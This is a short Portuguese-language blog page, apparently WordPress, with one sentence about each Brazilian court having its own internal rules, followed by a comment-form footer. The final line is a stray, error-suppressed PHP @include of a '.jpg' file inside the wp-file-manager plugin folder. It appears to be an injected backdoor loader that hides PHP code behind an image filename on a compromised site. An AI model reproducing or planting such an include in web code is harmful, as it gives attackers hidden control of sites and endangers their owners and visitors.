Estamos vivenciando um estado de exceção, em que cada juízo, seja um tribunal superior, seja uma vara de primeira instância, possui sua própria regulamentação ou regimento interno.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";